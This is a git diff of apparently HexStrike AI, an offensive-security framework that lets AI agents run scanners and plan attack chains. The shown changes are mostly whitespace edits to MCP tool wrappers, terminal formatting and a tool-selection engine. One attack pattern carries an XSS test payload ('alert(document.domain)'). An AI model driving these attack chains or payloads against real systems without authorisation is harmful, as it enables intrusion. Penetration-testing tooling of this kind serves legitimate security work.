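    print(f"Pages analyzed:  {summary.get('pages_analyzed', 0)}")
    print(f"Vulnerabilities: {summary.get('total_vulnerabilities', 0)}")
    print(f"Security score:  {summary.get('security_score', 0)}/100")
    for severity, count in summary.get("vulnerability_breakdown", {}).items():
        print(f"  {severity.upper()}: {count}")
```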
- + Args: target: Target URL or domain to scan scan_type: Type of scan (comprehensive, spider, passive, active) headless: Run browser in headless mode max_depth: Maximum crawling depth max_pages: Maximum pages to analyze - + Returns: Comprehensive security assessment results """ @@ -5295,25 +5302,25 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: "max_depth": max_depth, "max_pages": max_pages } - + logger.info(f"{HexStrikeColors.BLOOD_RED}๐Ÿ”ฅ Starting Burp Suite Alternative {scan_type} scan: {target}{HexStrikeColors.RESET}") result = hexstrike_client.safe_post("api/tools/burpsuite-alternative", data_payload) - + if result.get("success"): logger.info(f"{HexStrikeColors.SUCCESS}โœ… Burp Suite Alternative scan completed for {target}{HexStrikeColors.RESET}") - + # Enhanced logging for comprehensive results if result.get("result", {}).get("summary"): summary = result["result"]["summary"] total_vulns = summary.get("total_vulnerabilities", 0) pages_analyzed = summary.get("pages_analyzed", 0) security_score = summary.get("security_score", 0) - + logger.info(f"{HexStrikeColors.HIGHLIGHT_BLUE} SCAN SUMMARY {HexStrikeColors.RESET}") logger.info(f" ๐Ÿ“Š Pages Analyzed: {pages_analyzed}") logger.info(f" ๐Ÿšจ Vulnerabilities: {total_vulns}") logger.info(f" ๐Ÿ›ก๏ธ Security Score: {security_score}/100") - + # Log vulnerability breakdown vuln_breakdown = summary.get("vulnerability_breakdown", {}) for severity, count in vuln_breakdown.items(): @@ -5325,33 +5332,33 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: 'low': HexStrikeColors.YELLOW, 'info': HexStrikeColors.INFO }.get(severity.lower(), HexStrikeColors.WHITE) - + logger.info(f" {color}{severity.upper()}: {count}{HexStrikeColors.RESET}") else: logger.error(f"{HexStrikeColors.ERROR}โŒ Burp Suite Alternative scan failed for {target}{HexStrikeColors.RESET}") - + return result @mcp.tool() def error_handling_statistics() -> Dict[str, Any]: """ Get intelligent error handling system statistics and recent error patterns. - + Returns: Error handling statistics and patterns """ logger.info(f"{HexStrikeColors.ELECTRIC_PURPLE}๐Ÿ“Š Retrieving error handling statistics{HexStrikeColors.RESET}") result = hexstrike_client.safe_get("api/error-handling/statistics") - + if result.get("success"): stats = result.get("statistics", {}) total_errors = stats.get("total_errors", 0) recent_errors = stats.get("recent_errors_count", 0) - + logger.info(f"{HexStrikeColors.SUCCESS}โœ… Error statistics retrieved{HexStrikeColors.RESET}") logger.info(f" ๐Ÿ“ˆ Total Errors: {total_errors}") logger.info(f" ๐Ÿ•’ Recent Errors: {recent_errors}") - + # Log error breakdown by type error_counts = stats.get("error_counts_by_type", {}) if error_counts: @@ -5360,20 +5367,20 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: logger.info(f" {HexStrikeColors.FIRE_RED}{error_type}: {count}{HexStrikeColors.RESET}") else: logger.error(f"{HexStrikeColors.ERROR}โŒ Failed to retrieve error statistics{HexStrikeColors.RESET}") - + return result @mcp.tool() - def test_error_recovery(tool_name: str, error_type: str = "timeout", + def test_error_recovery(tool_name: str, error_type: str = "timeout", target: str = "example.com") -> Dict[str, Any]: """ Test the intelligent error recovery system with simulated failures. - + Args: tool_name: Name of tool to simulate error for error_type: Type of error to simulate (timeout, permission_denied, network_unreachable, etc.) 
target: Target for the simulated test - + Returns: Recovery strategy and system response """ @@ -5382,26 +5389,26 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: "error_type": error_type, "target": target } - + logger.info(f"{HexStrikeColors.RUBY}๐Ÿงช Testing error recovery for {tool_name} with {error_type}{HexStrikeColors.RESET}") result = hexstrike_client.safe_post("api/error-handling/test-recovery", data_payload) - + if result.get("success"): recovery_strategy = result.get("recovery_strategy", {}) action = recovery_strategy.get("action", "unknown") success_prob = recovery_strategy.get("success_probability", 0) - + logger.info(f"{HexStrikeColors.SUCCESS}โœ… Error recovery test completed{HexStrikeColors.RESET}") logger.info(f" ๐Ÿ”ง Recovery Action: {action}") logger.info(f" ๐Ÿ“Š Success Probability: {success_prob:.2%}") - + # Log alternative tools if available alternatives = result.get("alternative_tools", []) if alternatives: logger.info(f" ๐Ÿ”„ Alternative Tools: {', '.join(alternatives)}") else: logger.error(f"{HexStrikeColors.ERROR}โŒ Error recovery test failed{HexStrikeColors.RESET}") - + return result return mcp @@ -5409,7 +5416,7 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: def parse_args(): """Parse command line arguments.""" parser = argparse.ArgumentParser(description="Run the HexStrike AI MCP Client") - parser.add_argument("--server", type=str, default=DEFAULT_HEXSTRIKE_SERVER, + parser.add_argument("--server", type=str, default=DEFAULT_HEXSTRIKE_SERVER, help=f"HexStrike AI API server URL (default: {DEFAULT_HEXSTRIKE_SERVER})") parser.add_argument("--timeout", type=int, default=DEFAULT_REQUEST_TIMEOUT, help=f"Request timeout in seconds (default: {DEFAULT_REQUEST_TIMEOUT})") @@ -5419,20 +5426,20 @@ def parse_args(): def main(): """Main entry point for the MCP server.""" args = parse_args() - + # Configure logging based on debug flag if args.debug: logger.setLevel(logging.DEBUG) logger.debug("๐Ÿ” Debug logging enabled") - + # MCP compatibility: No banner output to avoid JSON parsing issues logger.info(f"๐Ÿš€ Starting HexStrike AI MCP Client v6.0") logger.info(f"๐Ÿ”— Connecting to: {args.server}") - + try: # Initialize the HexStrike AI client hexstrike_client = HexStrikeClient(args.server, args.timeout) - + # Check server health and log the result health = hexstrike_client.check_health() if "error" in health: @@ -5447,7 +5454,7 @@ def main(): missing_tools = [tool for tool, available in health.get("tools_status", {}).items() if not available] if missing_tools: logger.warning(f"โŒ Missing tools: {', '.join(missing_tools[:5])}{'...' 
if len(missing_tools) > 5 else ''}") - + # Set up and run the MCP server mcp = setup_mcp_server(hexstrike_client) logger.info("๐Ÿš€ Starting HexStrike AI MCP server") @@ -5460,4 +5467,4 @@ def main(): sys.exit(1) if __name__ == "__main__": - main() \ No newline at end of file + main() diff --git a/hexstrike_server.py b/hexstrike_server.py index ba01649..bd66d24 100644 --- a/hexstrike_server.py +++ b/hexstrike_server.py @@ -104,11 +104,11 @@ API_HOST = os.environ.get('HEXSTRIKE_HOST', '127.0.0.1') class ModernVisualEngine: """Beautiful, modern output formatting with animations and colors""" - + # Enhanced color palette with reddish tones and better highlighting COLORS = { 'MATRIX_GREEN': '\033[38;5;46m', - 'NEON_BLUE': '\033[38;5;51m', + 'NEON_BLUE': '\033[38;5;51m', 'ELECTRIC_PURPLE': '\033[38;5;129m', 'CYBER_ORANGE': '\033[38;5;208m', 'HACKER_RED': '\033[38;5;196m', @@ -161,7 +161,7 @@ class ModernVisualEngine: 'SPINNER': '\033[38;5;51m', # Cyan 'PULSE': '\033[38;5;196m\033[5m' # Blinking red } - + # Progress animation styles PROGRESS_STYLES = { 'dots': ['โ ‹', 'โ ™', 'โ น', 'โ ธ', 'โ ผ', 'โ ด', 'โ ฆ', 'โ ง', 'โ ‡', 'โ '], @@ -169,7 +169,7 @@ class ModernVisualEngine: 'arrows': ['โ†', 'โ†–', 'โ†‘', 'โ†—', 'โ†’', 'โ†˜', 'โ†“', 'โ†™'], 'pulse': ['โ—', 'โ—', 'โ—‘', 'โ—’', 'โ—“', 'โ—”', 'โ—•', 'โ—–', 'โ——', 'โ—˜'] } - + @staticmethod def create_banner() -> str: """Create the enhanced HexStrike banner""" @@ -184,8 +184,8 @@ class ModernVisualEngine: {title_block} โ–ˆโ–ˆโ•— โ–ˆโ–ˆโ•—โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•—โ–ˆโ–ˆโ•— โ–ˆโ–ˆโ•—โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•—โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•—โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•— โ–ˆโ–ˆโ•—โ–ˆโ–ˆโ•— โ–ˆโ–ˆโ•—โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•— โ–ˆโ–ˆโ•‘ โ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ•”โ•โ•โ•โ•โ•โ•šโ–ˆโ–ˆโ•—โ–ˆโ–ˆโ•”โ•โ–ˆโ–ˆโ•”โ•โ•โ•โ•โ•โ•šโ•โ•โ–ˆโ–ˆโ•”โ•โ•โ•โ–ˆโ–ˆโ•”โ•โ•โ–ˆโ–ˆโ•—โ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ•‘ โ–ˆโ–ˆโ•”โ•โ–ˆโ–ˆโ•”โ•โ•โ•โ•โ• -โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•— โ•šโ–ˆโ–ˆโ–ˆโ•”โ• โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•— โ–ˆโ–ˆโ•‘ โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•”โ•โ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•”โ• โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•— -โ–ˆโ–ˆโ•”โ•โ•โ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ•”โ•โ•โ• โ–ˆโ–ˆโ•”โ–ˆโ–ˆโ•— โ•šโ•โ•โ•โ•โ–ˆโ–ˆโ•‘ โ–ˆโ–ˆโ•‘ โ–ˆโ–ˆโ•”โ•โ•โ–ˆโ–ˆโ•—โ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ•”โ•โ–ˆโ–ˆโ•— โ–ˆโ–ˆโ•”โ•โ•โ• +โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•— โ•šโ–ˆโ–ˆโ–ˆโ•”โ• โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•— โ–ˆโ–ˆโ•‘ โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•”โ•โ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•”โ• โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•— +โ–ˆโ–ˆโ•”โ•โ•โ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ•”โ•โ•โ• โ–ˆโ–ˆโ•”โ–ˆโ–ˆโ•— โ•šโ•โ•โ•โ•โ–ˆโ–ˆโ•‘ โ–ˆโ–ˆโ•‘ โ–ˆโ–ˆโ•”โ•โ•โ–ˆโ–ˆโ•—โ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ•”โ•โ–ˆโ–ˆโ•— โ–ˆโ–ˆโ•”โ•โ•โ• โ–ˆโ–ˆโ•‘ โ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•—โ–ˆโ–ˆโ•”โ• โ–ˆโ–ˆโ•—โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•‘ โ–ˆโ–ˆโ•‘ โ–ˆโ–ˆโ•‘ โ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ•‘ โ–ˆโ–ˆโ•—โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•— โ•šโ•โ• โ•šโ•โ•โ•šโ•โ•โ•โ•โ•โ•โ•โ•šโ•โ• โ•šโ•โ•โ•šโ•โ•โ•โ•โ•โ•โ• โ•šโ•โ• โ•šโ•โ• โ•šโ•โ•โ•šโ•โ•โ•šโ•โ• โ•šโ•โ•โ•šโ•โ•โ•โ•โ•โ•โ• {RESET} @@ -200,7 +200,7 @@ class ModernVisualEngine: [INFO] Blood-red theme engaged โ€“ unified offensive operations UI{RESET} """ return banner - + @staticmethod def create_progress_bar(current: int, total: int, width: int = 50, tool: str = "") -> str: """Create a beautiful progress bar with cyberpunk styling""" @@ -208,10 +208,10 @@ class ModernVisualEngine: percentage = 0 else: percentage = min(100, (current / total) * 100) - + filled = int(width * percentage / 100) bar = 'โ–ˆ' * filled + 'โ–‘' * (width - filled) - + border = ModernVisualEngine.COLORS['PRIMARY_BORDER'] fill_col = ModernVisualEngine.COLORS['ACCENT_LINE'] return f""" @@ 
-220,17 +220,17 @@ class ModernVisualEngine: โ””โ”€{'โ”€' * (width + 10)}โ”˜{ModernVisualEngine.COLORS['RESET']}""" @staticmethod - def render_progress_bar(progress: float, width: int = 40, style: str = 'cyber', + def render_progress_bar(progress: float, width: int = 40, style: str = 'cyber', label: str = "", eta: float = 0, speed: str = "") -> str: """Render a beautiful progress bar with multiple styles""" - + # Clamp progress between 0 and 1 progress = max(0.0, min(1.0, progress)) - + # Calculate filled and empty portions filled_width = int(width * progress) empty_width = width - filled_width - + # Style-specific rendering if style == 'cyber': filled_char = 'โ–ˆ' @@ -252,22 +252,22 @@ class ModernVisualEngine: empty_char = 'โ–‘' bar_color = ModernVisualEngine.COLORS['ACCENT_LINE'] progress_color = ModernVisualEngine.COLORS['PRIMARY_BORDER'] - + # Build the progress bar filled_part = bar_color + filled_char * filled_width empty_part = ModernVisualEngine.COLORS['TERMINAL_GRAY'] + empty_char * empty_width percentage = f"{progress * 100:.1f}%" - + # Add ETA and speed if provided extra_info = "" if eta > 0: extra_info += f" ETA: {eta:.1f}s" if speed: extra_info += f" Speed: {speed}" - + # Build final progress bar bar_display = f"[{filled_part}{empty_part}{ModernVisualEngine.COLORS['RESET']}] {progress_color}{percentage}{ModernVisualEngine.COLORS['RESET']}" - + if label: return f"{label}: {bar_display}{extra_info}" else: @@ -276,7 +276,7 @@ class ModernVisualEngine: @staticmethod def create_live_dashboard(processes: Dict[int, Dict[str, Any]]) -> str: """Create a live dashboard showing all active processes""" - + if not processes: return f""" {ModernVisualEngine.COLORS['PRIMARY_BORDER']}โ•ญโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ•ฎ @@ -285,35 +285,35 @@ class ModernVisualEngine: โ”‚ {ModernVisualEngine.COLORS['TERMINAL_GRAY']}No active processes currently running{ModernVisualEngine.COLORS['PRIMARY_BORDER']} โ”‚ โ•ฐโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ•ฏ{ModernVisualEngine.COLORS['RESET']} """ - + dashboard_lines = [ f"{ModernVisualEngine.COLORS['PRIMARY_BORDER']}โ•ญโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ•ฎ", f"โ”‚ {ModernVisualEngine.COLORS['ACCENT_LINE']}๐Ÿ“Š HEXSTRIKE LIVE DASHBOARD{ModernVisualEngine.COLORS['PRIMARY_BORDER']} โ”‚", f"โ”œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”ค" ] - + for pid, proc_info in processes.items(): status = proc_info.get('status', 'unknown') command = proc_info.get('command', 'unknown')[:50] + "..." 
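The bar arithmetic in render_progress_bar above reduces to a clamp and an integer fill count. A plain-ASCII worked example of the same math, with colors omitted:

```python
def ascii_bar(progress: float, width: int = 40) -> str:
    progress = max(0.0, min(1.0, progress))  # clamp to [0, 1]
    filled = int(width * progress)           # whole cells to fill
    return "[" + "#" * filled + "-" * (width - filled) + f"] {progress * 100:.1f}%"

print(ascii_bar(0.625))  # 25 of 40 cells filled -> "[#####...----] 62.5%"
```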
if len(proc_info.get('command', '')) > 50 else proc_info.get('command', 'unknown') duration = proc_info.get('duration', 0) - + status_color = ModernVisualEngine.COLORS['ACCENT_LINE'] if status == 'running' else ModernVisualEngine.COLORS['HACKER_RED'] - + dashboard_lines.append( f"โ”‚ {ModernVisualEngine.COLORS['CYBER_ORANGE']}PID {pid}{ModernVisualEngine.COLORS['PRIMARY_BORDER']} | {status_color}{status}{ModernVisualEngine.COLORS['PRIMARY_BORDER']} | {ModernVisualEngine.COLORS['BRIGHT_WHITE']}{command}{ModernVisualEngine.COLORS['PRIMARY_BORDER']} โ”‚" ) - + dashboard_lines.append(f"โ•ฐโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ•ฏ{ModernVisualEngine.COLORS['RESET']}") - + return "\n".join(dashboard_lines) - + @staticmethod def format_vulnerability_card(vuln_data: Dict[str, Any]) -> str: """Format vulnerability as a beautiful card""" severity = vuln_data.get('severity', 'unknown').upper() name = vuln_data.get('name', 'Unknown Vulnerability') description = vuln_data.get('description', 'No description available') - + # Severity color mapping severity_colors = { 'CRITICAL': ModernVisualEngine.COLORS['VULN_CRITICAL'], @@ -322,9 +322,9 @@ class ModernVisualEngine: 'LOW': ModernVisualEngine.COLORS['CYBER_ORANGE'], 'INFO': ModernVisualEngine.COLORS['TERMINAL_GRAY'] } - + color = severity_colors.get(severity, ModernVisualEngine.COLORS['TERMINAL_GRAY']) - + return f""" {color}โ”Œโ”€ ๐Ÿšจ VULNERABILITY DETECTED โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ” โ”‚ {ModernVisualEngine.COLORS['BRIGHT_WHITE']}{name:<60}{color} โ”‚ @@ -342,22 +342,22 @@ class ModernVisualEngine: 'RECOVERY': ModernVisualEngine.COLORS['TOOL_RECOVERY'], 'WARNING': ModernVisualEngine.COLORS['WARNING'] } - + color = error_colors.get(error_type.upper(), ModernVisualEngine.COLORS['ERROR']) - + card = f""" {color}โ”Œโ”€ ๐Ÿ”ฅ ERROR DETECTED โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”{ModernVisualEngine.COLORS['RESET']} {color}โ”‚ {ModernVisualEngine.COLORS['BRIGHT_WHITE']}Tool: {tool_name:<55}{color} โ”‚{ModernVisualEngine.COLORS['RESET']} {color}โ”‚ {ModernVisualEngine.COLORS['BRIGHT_WHITE']}Type: {error_type:<55}{color} โ”‚{ModernVisualEngine.COLORS['RESET']} {color}โ”‚ {ModernVisualEngine.COLORS['BRIGHT_WHITE']}Error: {error_message[:53]:<53}{color} โ”‚{ModernVisualEngine.COLORS['RESET']}""" - + if recovery_action: card += f""" {color}โ”‚ {ModernVisualEngine.COLORS['TOOL_RECOVERY']}Recovery: {recovery_action[:50]:<50}{color} โ”‚{ModernVisualEngine.COLORS['RESET']}""" - + card += f""" {color}โ””โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”˜{ModernVisualEngine.COLORS['RESET']}""" - + return card @staticmethod @@ -370,16 +370,16 @@ class ModernVisualEngine: 'TIMEOUT': ModernVisualEngine.COLORS['TOOL_TIMEOUT'], 'RECOVERY': ModernVisualEngine.COLORS['TOOL_RECOVERY'] } - + color = status_colors.get(status.upper(), ModernVisualEngine.COLORS['INFO']) - + # Create progress bar if progress > 0 progress_bar = "" if progress > 0: filled = int(20 * progress) empty = 20 - filled progress_bar = f" [{ModernVisualEngine.COLORS['PROGRESS_BAR']}{'โ–ˆ' * 
filled}{ModernVisualEngine.COLORS['PROGRESS_EMPTY']}{'โ–‘' * empty}{ModernVisualEngine.COLORS['RESET']}] {progress*100:.1f}%" - + return f"{color}๐Ÿ”ง {tool_name.upper()}{ModernVisualEngine.COLORS['RESET']} | {color}{status}{ModernVisualEngine.COLORS['RESET']} | {ModernVisualEngine.COLORS['BRIGHT_WHITE']}{target}{ModernVisualEngine.COLORS['RESET']}{progress_bar}" @staticmethod @@ -392,7 +392,7 @@ class ModernVisualEngine: 'BLUE': ModernVisualEngine.COLORS['HIGHLIGHT_BLUE'], 'PURPLE': ModernVisualEngine.COLORS['HIGHLIGHT_PURPLE'] } - + color = highlight_colors.get(highlight_type.upper(), ModernVisualEngine.COLORS['HIGHLIGHT_RED']) return f"{color} {text} {ModernVisualEngine.COLORS['RESET']}" @@ -406,17 +406,17 @@ class ModernVisualEngine: 'LOW': ModernVisualEngine.COLORS['VULN_LOW'], 'INFO': ModernVisualEngine.COLORS['VULN_INFO'] } - + color = severity_colors.get(severity.upper(), ModernVisualEngine.COLORS['INFO']) count_text = f" ({count})" if count > 0 else "" - + return f"{color}{severity.upper()}{count_text}{ModernVisualEngine.COLORS['RESET']}" @staticmethod def create_section_header(title: str, icon: str = "๐Ÿ”ฅ", color: str = "FIRE_RED") -> str: """Create a section header with reddish styling""" header_color = ModernVisualEngine.COLORS.get(color, ModernVisualEngine.COLORS['FIRE_RED']) - + return f""" {header_color}{'โ•' * 70}{ModernVisualEngine.COLORS['RESET']} {header_color}{icon} {title.upper()}{ModernVisualEngine.COLORS['RESET']} @@ -432,10 +432,10 @@ class ModernVisualEngine: 'FAILED': ModernVisualEngine.COLORS['TOOL_FAILED'], 'TIMEOUT': ModernVisualEngine.COLORS['TOOL_TIMEOUT'] } - + color = status_colors.get(status.upper(), ModernVisualEngine.COLORS['INFO']) duration_text = f" ({duration:.2f}s)" if duration > 0 else "" - + return f"{color}โ–ถ {command[:60]}{'...' 
if len(command) > 60 else ''} | {status.upper()}{duration_text}{ModernVisualEngine.COLORS['RESET']}" # ============================================================================ @@ -488,7 +488,7 @@ class TargetProfile: attack_surface_score: float = 0.0 risk_level: str = "unknown" confidence_score: float = 0.0 - + def to_dict(self) -> Dict[str, Any]: """Convert TargetProfile to dictionary for JSON serialization""" return { @@ -518,7 +518,7 @@ class AttackStep: success_probability: float execution_time_estimate: int # seconds dependencies: List[str] = field(default_factory=list) - + class AttackChain: """Represents a sequence of attacks for maximum impact""" def __init__(self, target_profile: TargetProfile): @@ -528,26 +528,26 @@ class AttackChain: self.estimated_time: int = 0 self.required_tools: Set[str] = set() self.risk_level: str = "unknown" - + def add_step(self, step: AttackStep): """Add a step to the attack chain""" self.steps.append(step) self.required_tools.add(step.tool) self.estimated_time += step.execution_time_estimate - + def calculate_success_probability(self): """Calculate overall success probability of the attack chain""" if not self.steps: self.success_probability = 0.0 return - + # Use compound probability for sequential steps prob = 1.0 for step in self.steps: prob *= step.success_probability - + self.success_probability = prob - + def to_dict(self) -> Dict[str, Any]: """Convert AttackChain to dictionary""" return { @@ -571,13 +571,13 @@ class AttackChain: class IntelligentDecisionEngine: """AI-powered tool selection and parameter optimization engine""" - + def __init__(self): self.tool_effectiveness = self._initialize_tool_effectiveness() self.technology_signatures = self._initialize_technology_signatures() self.attack_patterns = self._initialize_attack_patterns() self._use_advanced_optimizer = True # Enable advanced optimization by default - + def _initialize_tool_effectiveness(self) -> Dict[str, Dict[str, float]]: """Initialize tool effectiveness ratings for different target types""" return { @@ -665,7 +665,7 @@ class IntelligentDecisionEngine: "pwninit": 0.85 # Great for CTF setup } } - + def _initialize_technology_signatures(self) -> Dict[str, Dict[str, List[str]]]: """Initialize technology detection signatures""" return { @@ -694,7 +694,7 @@ class IntelligentDecisionEngine: TechnologyStack.NODEJS.value: [3000, 8000, 8080, 9000] } } - + def _initialize_attack_patterns(self) -> Dict[str, List[Dict[str, Any]]]: """Initialize common attack patterns for different scenarios""" return { @@ -807,34 +807,34 @@ class IntelligentDecisionEngine: {"tool": "dalfox", "priority": 4, "params": {"blind": True, "mining_dom": True, "custom_payload": "alert(document.domain)"}} ] } - + def analyze_target(self, target: str) -> TargetProfile: """Analyze target and create comprehensive profile""" profile = TargetProfile(target=target) - + # Determine target type profile.target_type = self._determine_target_type(target) - + # Basic network analysis if profile.target_type in [TargetType.WEB_APPLICATION, TargetType.API_ENDPOINT]: profile.ip_addresses = self._resolve_domain(target) - + # Technology detection (basic heuristics) if profile.target_type == TargetType.WEB_APPLICATION: profile.technologies = self._detect_technologies(target) profile.cms_type = self._detect_cms(target) - + # Calculate attack surface score profile.attack_surface_score = self._calculate_attack_surface(profile) - + # Determine risk level profile.risk_level = self._determine_risk_level(profile) - + # Set confidence 
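Because calculate_success_probability above multiplies the per-step probabilities, chain confidence decays quickly with length. A small worked example:

```python
steps = [0.9, 0.8, 0.7]  # per-step success probabilities
prob = 1.0
for p in steps:
    prob *= p
print(f"{prob:.3f}")  # 0.504 -- three individually strong steps already fall to ~50%
```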
score profile.confidence_score = self._calculate_confidence(profile) - + return profile - + def _determine_target_type(self, target: str) -> TargetType: """Determine the type of target for appropriate tool selection""" # URL patterns @@ -843,25 +843,25 @@ class IntelligentDecisionEngine: if '/api/' in parsed.path or parsed.path.endswith('/api'): return TargetType.API_ENDPOINT return TargetType.WEB_APPLICATION - + # IP address pattern if re.match(r'^(\d{1,3}\.){3}\d{1,3}$', target): return TargetType.NETWORK_HOST - + # Domain name pattern if re.match(r'^[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}$', target): return TargetType.WEB_APPLICATION - + # File patterns if target.endswith(('.exe', '.bin', '.elf', '.so', '.dll')): return TargetType.BINARY_FILE - + # Cloud service patterns if any(cloud in target.lower() for cloud in ['amazonaws.com', 'azure', 'googleapis.com']): return TargetType.CLOUD_SERVICE - + return TargetType.UNKNOWN - + def _resolve_domain(self, target: str) -> List[str]: """Resolve domain to IP addresses""" try: @@ -869,50 +869,50 @@ class IntelligentDecisionEngine: hostname = urllib.parse.urlparse(target).hostname else: hostname = target - + if hostname: ip = socket.gethostbyname(hostname) return [ip] except Exception: pass return [] - + def _detect_technologies(self, target: str) -> List[TechnologyStack]: """Detect technologies using basic heuristics""" technologies = [] - + # This is a simplified version - in practice, you'd make HTTP requests # and analyze headers, content, etc. - + # For now, return some common technologies based on target patterns if 'wordpress' in target.lower() or 'wp-' in target.lower(): technologies.append(TechnologyStack.WORDPRESS) - + if any(ext in target.lower() for ext in ['.php', 'php']): technologies.append(TechnologyStack.PHP) - + if any(ext in target.lower() for ext in ['.asp', '.aspx']): technologies.append(TechnologyStack.DOTNET) - + return technologies if technologies else [TechnologyStack.UNKNOWN] - + def _detect_cms(self, target: str) -> Optional[str]: """Detect CMS 